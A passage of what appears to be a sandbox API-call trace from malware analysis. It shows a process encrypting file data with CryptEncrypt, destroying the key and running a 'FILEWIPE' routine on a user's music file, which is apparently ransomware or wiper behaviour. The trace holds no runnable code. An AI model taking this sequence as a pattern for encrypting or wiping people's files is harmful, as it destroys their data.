0x10 [0185.545] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.545] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.545] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.545] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.545] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.545] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.546] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7f10, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x7f20) returned 1 [0185.546] CharLowerBuffW (in: lpsz="byte[32545]", cchLength=0xb | out: lpsz="byte[32545]") returned 0xb [0185.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.548] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc01d60*, pdwDataLen=0x87e820*=0x7f10, dwBufLen=0x7f20 | out: pbData=0xc01d60*, pdwDataLen=0x87e820*=0x7f20) returned 1 [0185.557] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.568] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0185.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.568] CryptDestroyKey (hKey=0x90af18) returned 1 [0185.568] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.568] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.568] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.569] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.569] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.569] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0185.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.569] FreeLibrary (hLibModule=0x74f20000) returned 1 [0185.574] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0185.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0x90ae18 [0185.575] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.575] CharLowerBuffW (in: lpsz="byte[32528]", cchLength=0xb | out: lpsz="byte[32528]") returned 0xb [0185.576] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0185.576] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0185.576] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26d8 [0185.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.577] FreeLibrary (hLibModule=0x75c90000) returned 1 [0185.577] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0185.578] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.578] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0185.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0185.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0185.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\hdcqagk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0185.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1f20 | out: hHeap=0x8a0000) returned 1 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.581] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.583] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0185.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: 